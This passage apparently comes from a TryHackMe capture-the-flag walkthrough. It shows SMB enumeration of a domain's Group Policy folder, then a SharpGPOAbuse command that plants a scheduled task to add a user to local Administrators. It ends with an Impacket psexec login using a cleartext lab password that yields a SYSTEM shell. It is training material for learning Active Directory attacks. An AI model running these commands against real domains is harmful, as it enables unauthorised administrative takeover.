  vulnnet.local                      Dr        0  Tue Feb 23 04:29:58 2021

		9558271 blocks of size 4096. 5157762 blocks available
smb: \> cd vulnnet.local\Policies
smb: \vulnnet.local\Policies\> ls
  .                                   D        0  Tue Feb 23 04:30:37 2021
  ..                                  D        0  Tue Feb 23 04:30:37 2021
  {31B2F340-016D-11D2-945F-00C04FB984F9}      D        0  Tue Feb 23 04:30:37 2021
  {6AC1786C-016F-11D2-945F-00C04fB984F9}      D        0  Tue Feb 23 04:30:37 2021

		9558271 blocks of size 4096. 5157753 blocks available
smb: \vulnnet.local\Policies\> cd {31B2F340-016D-11D2-945F-00C04FB984F9}
smb: \vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\> ls
  .                                   D        0  Tue Feb 23 04:30:37 2021
  ..                                  D        0  Tue Feb 23 04:30:37 2021
  GPT.INI                             A       22  Tue Feb 23 04:36:27 2021
  MACHINE                             D        0  Tue Feb 23 16:58:25 2021
  USER                                D        0  Tue Feb 23 04:30:37 2021

Download SharpGPOAbuse and put it inside machine

PS C:\Enterprise-Share>  .\SharpGPOAbuse.exe --AddComputerTask --TaskName "makemeadmin" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN" --Force
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Modifying \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!

----

net user enterprise-security
User name                    enterprise-security
Full Name                    Enterprise Security
Comment                      TryHackMe
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/23/2021 3:01:37 PM
Password expires             Never
Password changeable          2/24/2021 3:01:37 PM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   2/8/2024 11:10:09 AM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *Domain Users         
The command completed successfully.

--------

python psexec.py enterprise-security:sand_0873959498@10.10.49.44
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Requesting shares on 10.10.49.44.....  
[*] Found writable share ADMIN$  
[*] Uploading file qludKPxL.exe 
[*] Opening SVCManager on 10.10.49.44.....  
[*] Creating service cvAd on 10.10.49.44.....  
[*] Starting service cvAd.....  
[!] Press help for extra shell commands  
Microsoft Windows [Version 10.0.17763.1757]  
(c) 2018 Microsoft Corporation. All rights reserved.  
  
C:\Windows\system32>whoami  
nt authority\system

PreviousTryHackMe AttacktiveDirectory NextTryHackMe Ice

Last updated 1 year ago